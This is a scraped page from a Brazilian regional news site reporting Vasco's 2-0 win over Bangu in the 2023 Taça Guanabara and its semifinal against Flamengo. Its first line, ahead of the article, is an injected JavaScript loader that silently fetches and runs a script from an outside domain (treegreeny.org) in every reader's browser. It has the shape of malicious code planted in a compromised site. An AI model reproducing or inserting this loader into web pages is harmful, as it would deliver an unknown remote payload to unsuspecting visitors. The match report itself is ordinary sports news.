;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vasco sofre, mas garante vantagem na semi - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Vasco sofre, mas garante vantagem na semi

Time de Maurício Barbieri se classifica na segunda posição e jogará com vantagem na próxima fase

Diante de São Januário lotado, o Vasco venceu o Bangu por 2 a 0, e garantiu a segunda colocação da Taça Guanabara. Com o resultado, a equipe de Barbieri terá vantagem do empate nas semifinais contra o Flamengo.

.

Depois de um início promissor, com gol e Pec e boa atuação coletiva, o Vasco diminuiu muito sua intensidade e viu o Bangu crescer e ser melhor em vários momentos da partida. No segundo tempo, após a expulsão de Kevin, a equipe vascaína se recompôs para garantir a vitória em gol de Pedro Raul.

Vasco 2 x 0 Bangu – Melhores momentos – 11ª rodada do Cariocão 2023

  • Pedro Raul – Vasco x Bangu (Foto: André Durão)
  • Data da semifinal confirmada

O Vasco vai enfrentar o Flamengo na próxima segunda-feira, 13, às 21h10, no Maracanã, em jogo de ida.

.Na outra chave, o Volta Redonda vai enfrentar o Fluminense, no Raulino de Oliveira.

  • Primeiro tempoVasco começou o jogo avassalador, empurrando o Bangu para a defesa. Aos 5 minutos, Pec abriu o placar com gol de cabeça, e a equipe seguiu criando oportunidades. Mas, por volta de 20 minutos, o time de Barbieri passou a ceder espaços e a equipe da zona oeste cresceu. Com muita troca de passes e velocidade nas pontas, o time de Felipe Maestro conseguiu incomodar bastante. Principalmente, com Luis Felipe e Edinho. O Vasco caiu muito de rendimento, mas conseguiu um pênalti em falta duvidosa sobre Paulo Victor. Alex Teixeira cobrou, mas Matheus Santillo saltou para defender.

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.